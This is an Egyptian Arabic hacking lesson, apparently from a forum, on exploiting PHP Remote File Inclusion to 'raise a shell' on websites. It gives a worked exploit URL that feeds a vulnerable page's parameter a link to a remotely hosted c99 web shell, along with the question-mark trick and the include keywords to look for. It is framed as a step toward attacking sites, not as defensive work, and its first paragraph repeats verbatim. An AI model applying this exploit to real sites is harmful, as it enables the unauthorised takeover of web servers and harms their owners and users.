بسم الله الرحمن الرحيم
بعد ماعرفنا انواع الثغرات وكل ثغره ايه الفائده منه لازم نعرف كل ثغره ازي ممكن نستثمر الثغره في رفع الشل
Remote file include
الثغره دي دايما في صفحات
PHP
ودي لغه برمجه صفحات النت
ازي تعرف ان الصفحه بي اش بي ولا مش بي اتش بي
صفحات البي اش بي تبدء
PHP
ويكون السبب في الثغره حاجه اسمه الداله
الى هي
INCLUDE
بعد ماعرفنا انواع الثغرات وكل ثغره ايه الفائده منه لازم نعرف كل ثغره ازي ممكن نستثمر الثغره في رفع الشل
Remote file include
الثغره دي دايما في صفحات
PHP
ودي لغه برمجه صفحات النت
ازي تعرف ان الصفحه بي اش بي ولا مش بي اتش بي
صفحات البي اش بي تبدء
PHP
ويكون السبب في الثغره حاجه اسمه الداله
الى هي
INCLUDE
امر من اوامر الابي اتش بي يقوم باستدعاء الملف من اي مكان وتطبق الى فيه
الحاجه التانيه الي تفيدنه
$
المتغير
اهم حاجه في ثغرة الانكلود الى هي بتسمح التعديل على مكان الانكلود
Remote file include
مثال
PHP
ده المثال في متغير الى هو $
وده معناه انك ممكن تستغله في انك تعمل انكلود لاي صفحه من اي مكان
باي صفحه من خارج الموقع الى هو الشل
طيب لو مفيش متغير الى هو $ ماينفع استغلال ثغره الانكلود
ويكون استغلال لو في متغير على المثال الى فوق
http://www.web.com/filname.php?ha$$anhi5=www.hassan.com/c99.txt?
http://www.web.com اسم الموقع الى عليه الثغره
/filname.php? دي الصفحه الى فيه الانكلود
ha$$anhi5= المتغير الى مكتوب في الصفحه
www.hassan.com/c99.txt? رابط الشل يكون
افتكر علامت الاستفهام
عشان ملف التكست يفتح بي اتش بي
وافتكر لازم يكون في متغير الى هو $ عشان تقدر تغير الانكلود الاصلى الى اي صفحه
وامشاء الله في شرح فديو لكشف واستغلال الثغره
والكلمات الداله على الانكلود
Include
Include _once
Require_once
ومش اي متغير يكون انكلود في متغيرات بتكون في قواعد البينات الى هي
Sql
وانشاء الله في دوره لاحتراف حقن قواعد البينات الى هي
Sql injection
الدرس الجاي شرح ثغره
Remote commands execution
وهي شبيه بثغره الانكلود